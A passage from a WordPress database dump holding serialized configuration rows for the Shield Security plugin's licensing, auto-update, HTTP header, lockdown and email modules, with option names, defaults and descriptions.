PRO!\";s:4:\"slug\";s:12:\"pro-redirect\";s:9:\"highlight\";b:1;}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:12:\"pro-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"license\";}}}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{i:0;a:6:{s:3:\"key\";s:11:\"license_key\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:1;a:5:{s:3:\"key\";s:20:\"license_activated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:2;a:5:{s:3:\"key\";s:22:\"license_deactivated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:3;a:5:{s:3:\"key\";s:23:\"license_last_checked_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:4;a:5:{s:3:\"key\";s:26:\"last_warning_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:5;a:5:{s:3:\"key\";s:30:\"last_deactivated_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:6;a:5:{s:3:\"key\";s:11:\"last_errors\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";s:0:\"\";}i:7;a:6:{s:3:\"key\";s:13:\"last_error_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:8;a:6:{s:3:\"key\";s:22:\"keyless_handshake_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:9;a:6:{s:3:\"key\";s:23:\"keyless_handshake_until\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:10;a:6:{s:3:\"key\";s:12:\"license_data\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:11;a:5:{s:3:\"key\";s:18:\"wphashes_api_token\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:10:{s:21:\"license_store_url_api\";s:59:\"https://api.getshieldsecurity.com/wp-json/odp-eddkeyless/v1\";s:10:\"keyless_cp\";s:19:\"https://shsec.io/c5\";s:17:\"license_item_name\";s:19:\"Shield Security Pro\";s:15:\"license_item_id\";s:4:\"6047\";s:20:\"license_item_name_sc\";s:40:\"Shield Security Pro (via Shield Central)\";s:22:\"lic_verify_expire_days\";i:7;s:28:\"lic_verify_expire_grace_days\";i:3;s:7:\"keyless\";b:1;s:24:\"keyless_handshake_expire\";i:90;s:6:\"events\";a:3:{s:17:\"lic_check_success\";a:1:{s:4:\"stat\";b:0;}s:14:\"lic_fail_email\";a:1:{s:4:\"stat\";b:0;}s:19:\"lic_fail_deactivate\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468227,'_site_transient_shield_mod_config_e6c4c7e9973d941405df178603e30c94','a:6:{s:4:\"slug\";s:11:\"autoupdates\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"autoupdates\";s:4:\"name\";s:17:\"Automatic Updates\";s:12:\"sidebar_name\";s:12:\"Auto Updates\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"autoupdates\";s:7:\"tagline\";s:53:\"Take back full control of WordPress automatic updates\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:60;}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"primary\";b:1;s:5:\"title\";s:42:\"Automatic Updates For WordPress Components\";s:11:\"title_short\";s:20:\"WordPress Components\";s:9:\"beacon_id\";i:236;s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Control how automatic updates for each WordPress component is handled.\";i:1;s:80:\"Recommendation - You should at least allow minor updates for the WordPress core.\";}}i:1;a:5:{s:4:\"slug\";s:15:\"section_options\";s:5:\"title\";s:19:\"Auto-Update Options\";s:11:\"title_short\";s:19:\"Auto-Update Options\";s:9:\"beacon_id\";i:234;s:7:\"summary\";s:77:\"Purpose - Make adjustments to how automatic updates are handled on your site.\";}i:2;a:5:{s:4:\"slug\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:5:\"title\";s:32:\"Enable Module: Automatic Updates\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:234;s:7:\"summary\";a:2:{i:0;s:137:\"Purpose - Automatic Updates lets you manage the WordPress automatic updates engine so you choose what exactly gets updated automatically.\";i:1;s:62:\"Recommendation - Keep the Automatic Updates feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:11:{i:0;a:11:{s:3:\"key\";s:18:\"enable_autoupdates\";s:7:\"section\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3w\";s:9:\"link_blog\";s:19:\"https://shsec.io/hj\";s:9:\"beacon_id\";i:234;s:4:\"name\";s:24:\"Enable Automatic Updates\";s:7:\"summary\";s:48:\"Enable (or Disable) The Automatic Updates module\";s:11:\"description\";s:76:\"Un-Checking this option will completely disable the Automatic Updates module\";}i:1;a:11:{s:3:\"key\";s:29:\"enable_autoupdate_disable_all\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3v\";s:9:\"link_blog\";s:19:\"https://shsec.io/k6\";s:9:\"beacon_id\";i:405;s:4:\"name\";s:11:\"Disable All\";s:7:\"summary\";s:46:\"Completely Disable WordPress Automatic Updates\";s:11:\"description\";s:122:\"When selected, regardless of any other settings, all WordPress automatic updates on this site will be completely disabled!\";}i:2;a:11:{s:3:\"key\";s:15:\"autoupdate_core\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:10:\"core_minor\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:10:\"core_never\";s:4:\"text\";s:5:\"Never\";}i:1;a:2:{s:9:\"value_key\";s:10:\"core_minor\";s:4:\"text\";s:19:\"Minor Versions Only\";}i:2;a:2:{s:9:\"value_key\";s:10:\"core_major\";s:4:\"text\";s:24:\"Major and Minor Versions\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:237;s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:3;a:9:{s:3:\"key\";s:25:\"enable_autoupdate_plugins\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:28:\"Automatically Update Plugins\";s:11:\"description\";s:73:\"Note: Automatic updates for plugins are disabled on WordPress by default.\";}i:4;a:10:{s:3:\"key\";s:24:\"enable_autoupdate_themes\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:27:\"Automatically Update Themes\";s:11:\"description\";s:72:\"Note: Automatic updates for themes are disabled on WordPress by default.\";}i:5;a:11:{s:3:\"key\";s:12:\"update_delay\";s:7:\"section\";s:15:\"section_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"0\";s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/e5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:137;s:4:\"name\";s:12:\"Update Delay\";s:7:\"summary\";s:47:\"Delay Automatic Updates For Period Of Stability\";s:11:\"description\";s:94:\"Shield will delay upgrades until the new update has been available for the set number of days.\";}i:6;a:12:{s:3:\"key\";s:22:\"autoupdate_plugin_self\";s:7:\"section\";s:15:\"section_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:4:\"auto\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"auto\";s:4:\"text\";s:21:\"Let The Plugin Decide\";}i:1;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:2;a:2:{s:9:\"value_key\";s:9:\"immediate\";s:4:\"text\";s:19:\"As Soon As Possible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:409;s:4:\"name\";s:18:\"Auto Update Plugin\";s:7:\"summary\";s:39:\"Always Automatically Update This Plugin\";s:11:\"description\";s:73:\"Regardless of any other settings, automatically update the Shield plugin.\";}i:7;a:9:{s:3:\"key\";s:33:\"enable_upgrade_notification_email\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Report Email\";s:7:\"summary\";s:42:\"Send email notices after automatic updates\";s:11:\"description\";s:81:\"You can turn on/off email notices from automatic updates by un/checking this box.\";}i:8;a:10:{s:3:\"key\";s:22:\"override_email_address\";s:7:\"section\";s:15:\"section_options\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Report Email Address\";s:7:\"summary\";s:42:\"Where to send upgrade notification reports\";s:11:\"description\";s:65:\"If this is empty, it will default to the Site Admin email address\";}i:9;a:6:{s:3:\"key\";s:14:\"delay_tracking\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:10;a:5:{s:3:\"key\";s:16:\"selected_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:1:{s:20:\"action_hook_priority\";i:1000;}s:10:\"meta_modts\";i:1628268100;}','no'),(468228,'_site_transient_shield_mod_config_e0d6ff88278df057ce5240bb8e81a8e9','a:5:{s:4:\"slug\";s:7:\"headers\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"headers\";s:4:\"name\";s:12:\"HTTP Headers\";s:12:\"sidebar_name\";s:12:\"HTTP Headers\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"headers\";s:7:\"tagline\";s:29:\"Control HTTP Security Headers\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:80;}s:8:\"sections\";a:4:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:24:\"section_security_headers\";s:5:\"title\";s:25:\"Advanced Security Headers\";s:11:\"title_short\";s:16:\"Security Headers\";s:9:\"beacon_id\";i:267;s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:1;a:5:{s:4:\"slug\";s:31:\"section_content_security_policy\";s:5:\"title\";s:23:\"Content Security Policy\";s:11:\"title_short\";s:23:\"Content Security Policy\";s:9:\"beacon_id\";i:155;s:7:\"summary\";a:2:{i:0;s:105:\"Purpose - Restrict the sources and types of content that may be loaded and processed by visitor browsers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:2;a:5:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_headers\";s:5:\"title\";s:27:\"Enable Module: HTTP Headers\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:265;s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:7:{i:0;a:11:{s:3:\"key\";s:14:\"enable_headers\";s:7:\"section\";s:37:\"section_enable_plugin_feature_headers\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/aj\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:9:\"beacon_id\";i:265;s:4:\"name\";s:19:\"Enable HTTP Headers\";s:7:\"summary\";s:43:\"Enable (or Disable) The HTTP Headers module\";s:11:\"description\";s:71:\"Un-Checking this option will completely disable the HTTP Headers module\";}i:1;a:10:{s:3:\"key\";s:7:\"x_frame\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:13:\"on_sameorigin\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:3:\"off\";s:4:\"text\";s:24:\"Off: iFrames Not Blocked\";}i:1;a:2:{s:9:\"value_key\";s:13:\"on_sameorigin\";s:4:\"text\";s:36:\"On: Allow iFrames On The Same Domain\";}i:2;a:2:{s:9:\"value_key\";s:7:\"on_deny\";s:4:\"text\";s:21:\"On: Block All iFrames\";}}s:9:\"link_info\";s:19:\"https://shsec.io/78\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:13:\"Block iFrames\";s:7:\"summary\";s:33:\"Block Remote iFrames Of This Site\";s:11:\"description\";s:139:\"The setting prevents any external website from embedding your site in an iFrame. This is useful for preventing so-called ClickJack attacks.\";}i:2;a:9:{s:3:\"key\";s:13:\"x_xss_protect\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/79\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:14:\"XSS Protection\";s:7:\"summary\";s:38:\"Employ Built-In Browser XSS Protection\";s:11:\"description\";s:80:\"Directs compatible browsers to block what they detect as Reflective XSS attacks.\";}i:3;a:9:{s:3:\"key\";s:14:\"x_content_type\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7a\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:18:\"Prevent Mime-Sniff\";s:7:\"summary\";s:27:\"Turn-Off Browser Mime-Sniff\";s:11:\"description\";s:60:\"Reduces visitor exposure to malicious user-uploaded content.\";}i:4;a:11:{s:3:\"key\";s:17:\"x_referrer_policy\";s:7:\"section\";s:24:\"section_security_headers\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:10:\"unsafe-url\";s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"unsafe-url\";s:4:\"text\";s:45:\"Default: Full Referrer URL (aka \'Unsafe URL\')\";}i:1;a:2:{s:9:\"value_key\";s:11:\"no-referrer\";s:4:\"text\";s:11:\"No Referrer\";}i:2;a:2:{s:9:\"value_key\";s:26:\"no-referrer-when-downgrade\";s:4:\"text\";s:26:\"No Referrer When Downgrade\";}i:3;a:2:{s:9:\"value_key\";s:11:\"same-origin\";s:4:\"text\";s:11:\"Same Origin\";}i:4;a:2:{s:9:\"value_key\";s:6:\"origin\";s:4:\"text\";s:6:\"Origin\";}i:5;a:2:{s:9:\"value_key\";s:13:\"strict-origin\";s:4:\"text\";s:13:\"Strict Origin\";}i:6;a:2:{s:9:\"value_key\";s:24:\"origin-when-cross-origin\";s:4:\"text\";s:24:\"Origin When Cross-Origin\";}i:7;a:2:{s:9:\"value_key\";s:31:\"strict-origin-when-cross-origin\";s:4:\"text\";s:31:\"Strict Origin When Cross-Origin\";}i:8;a:2:{s:9:\"value_key\";s:5:\"empty\";s:4:\"text\";s:12:\"Empty Header\";}i:9;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:33:\"Disabled - Don\'t Send This Header\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Referrer Policy\";s:7:\"summary\";s:22:\"Referrer Policy Header\";s:11:\"description\";s:141:\"The Referrer Policy Header allows you to control when and what referral information a browser may pass along with links clicked on your site.\";}i:5;a:11:{s:3:\"key\";s:32:\"enable_x_content_security_policy\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7d\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:9:\"beacon_id\";i:155;s:4:\"name\";s:30:\"Enable Content Security Policy\";s:7:\"summary\";s:54:\"Enable (or Disable) The Content Security Policy module\";s:11:\"description\";s:75:\"Allows for permission and restriction of all resources loaded on your site.\";}i:6;a:11:{s:3:\"key\";s:11:\"xcsp_custom\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/g9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:155;s:4:\"name\";s:12:\"Manual Rules\";s:7:\"summary\";s:16:\"Manual CSP Rules\";s:11:\"description\";s:17:\"Manual CSP rules.\";}}s:10:\"meta_modts\";i:1628268100;}','no'),(468229,'_site_transient_shield_mod_config_06adfe4b6eee2940cee149d020360f7a','a:6:{s:4:\"slug\";s:8:\"lockdown\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"lockdown\";s:4:\"name\";s:11:\"WP Lockdown\";s:12:\"sidebar_name\";s:8:\"Lockdown\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"lockdown\";s:7:\"tagline\";s:56:\"Harden the more loosely controlled settings of your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:90;}s:8:\"sections\";a:5:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:14:\"section_apixml\";s:5:\"title\";s:25:\"WordPress System Lockdown\";s:11:\"title_short\";s:6:\"System\";s:9:\"beacon_id\";i:413;s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Lockdown certain core WordPress system features.\";i:1;s:99:\"Recommendation - This depends on your usage and needs for certain WordPress functions and features.\";}}i:1;a:5:{s:4:\"slug\";s:33:\"section_permission_access_options\";s:5:\"title\";s:30:\"Permissions and Access Options\";s:11:\"title_short\";s:11:\"Permissions\";s:9:\"beacon_id\";i:415;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Provides finer control of certain WordPress permissions.\";i:1;s:75:\"Recommendation - Only enable SSL if you have a valid certificate installed.\";}}i:2;a:5:{s:4:\"slug\";s:35:\"section_wordpress_obscurity_options\";s:5:\"title\";s:27:\"WordPress Obscurity Options\";s:11:\"title_short\";s:9:\"Obscurity\";s:9:\"beacon_id\";i:418;s:7:\"summary\";a:2:{i:0;s:63:\"Purpose - Obscures certain WordPress settings from public view.\";i:1;s:103:\"Recommendation - Obscurity is not true security and so these settings are down to your personal tastes.\";}}i:3;a:5:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:5:\"title\";s:23:\"Enable Module: Lockdown\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:272;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Lockdown helps secure-up certain loosely-controlled WordPress settings on your site.\";i:1;s:53:\"Recommendation - Keep the Lockdown feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:11:{s:3:\"key\";s:15:\"enable_lockdown\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4r\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:272;s:4:\"name\";s:15:\"Enable Lockdown\";s:7:\"summary\";s:39:\"Enable (or Disable) The Lockdown module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Lockdown module\";}i:1;a:10:{s:3:\"key\";s:14:\"disable_xmlrpc\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e6\";s:9:\"link_blog\";s:19:\"https://shsec.io/fb\";s:9:\"beacon_id\";i:414;s:4:\"name\";s:15:\"Disable XML-RPC\";s:7:\"summary\";s:26:\"Disable The XML-RPC System\";s:11:\"description\";s:71:\"Checking this option will completely turn off the whole XML-RPC system.\";}i:2;a:10:{s:3:\"key\";s:25:\"disable_anonymous_restapi\";s:7:\"section\";s:14:\"section_apixml\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Anonymous Rest API\";s:7:\"summary\";s:30:\"Disable The Anonymous Rest API\";s:11:\"description\";s:82:\"Checking this option will completely turn off the whole Anonymous Rest API system.\";}i:3;a:9:{s:3:\"key\";s:24:\"api_namespace_exclusions\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:11:\"woocommerce\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Rest API Exclusions\";s:7:\"summary\";s:29:\"Anonymous REST API Exclusions\";s:11:\"description\";s:81:\"Any namespaces provided here will be excluded from the Anonymous API restriction.\";}i:4;a:10:{s:3:\"key\";s:20:\"disable_file_editing\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4q\";s:9:\"link_blog\";s:19:\"https://shsec.io/hk\";s:9:\"beacon_id\";i:416;s:4:\"name\";s:20:\"Disable File Editing\";s:7:\"summary\";s:51:\"Disable Ability To Edit Files From Within WordPress\";s:11:\"description\";s:135:\"Removes the option to directly edit any files from within the WordPress admin area. Equivalent to setting \'DISALLOW_FILE_EDIT\' to TRUE.\";}i:5;a:10:{s:3:\"key\";s:15:\"force_ssl_admin\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4t\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:417;s:4:\"name\";s:15:\"Force SSL Admin\";s:7:\"summary\";s:57:\"Forces WordPress Admin Dashboard To Be Delivered Over SSL\";s:11:\"description\";s:126:\"Please only enable this option if you have a valid SSL certificate installed. Equivalent to setting \'FORCE_SSL_ADMIN\' to TRUE.\";}i:6;a:9:{s:3:\"key\";s:22:\"block_author_discovery\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf23\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Block Username Fishing\";s:7:\"summary\";s:69:\"Block the ability to discover WordPress usernames based on author IDs\";s:11:\"description\";s:150:\"When enabled, any URL requests containing \'author=\' will be killed. Warning: Enabling this option may interfere with expected operations of your site.\";}i:7;a:9:{s:3:\"key\";s:16:\"clean_wp_rubbish\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Clean WP Files\";s:7:\"summary\";s:41:\"Automatically Delete Unnecessary WP Files\";s:11:\"description\";s:63:\"Automatically delete WordPress files like wp-config-sample.php.\";}i:8;a:9:{s:3:\"key\";s:28:\"hide_wordpress_generator_tag\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"WP Generator Tag\";s:7:\"summary\";s:28:\"Remove WP Generator Meta Tag\";s:11:\"description\";s:119:\"Remove a meta tag from your WordPress pages that publicly displays that your site is WordPress and its current version.\";}}s:11:\"definitions\";a:2:{s:26:\"default_restapi_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}s:6:\"events\";a:2:{s:23:\"block_anonymous_restapi\";a:1:{s:6:\"recent\";b:1;}s:9:\"block_xml\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468230,'_site_transient_shield_mod_config_e83942c5345a48e3fa64d19f6d59def1','a:7:{s:4:\"slug\";s:5:\"comms\";s:10:\"properties\";a:15:{s:4:\"slug\";s:5:\"comms\";s:11:\"storage_key\";s:5:\"comms\";s:4:\"name\";s:5:\"Comms\";s:10:\"menu_title\";s:5:\"Comms\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:2:{i:0;a:5:{s:7:\"primary\";b:1;s:4:\"slug\";s:16:\"section_suresend\";s:5:\"title\";s:14:\"SureSend Email\";s:11:\"title_short\";s:14:\"SureSend Email\";s:9:\"beacon_id\";i:156;}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:11:{s:3:\"key\";s:15:\"suresend_emails\";s:7:\"section\";s:16:\"section_suresend\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:13:\"value_options\";a:1:{i:0;a:2:{s:9:\"value_key\";s:3:\"2fa\";s:4:\"text\";s:29:\"2FA Login Codes (admins only)\";}}s:9:\"link_info\";s:18:\"https://icwp.io/ij\";s:9:\"link_blog\";s:18:\"https://icwp.io/ik\";s:4:\"name\";s:15:\"SureSend Emails\";s:7:\"summary\";s:15:\"SureSend Emails\";s:11:\"description\";s:16:\"SureSend 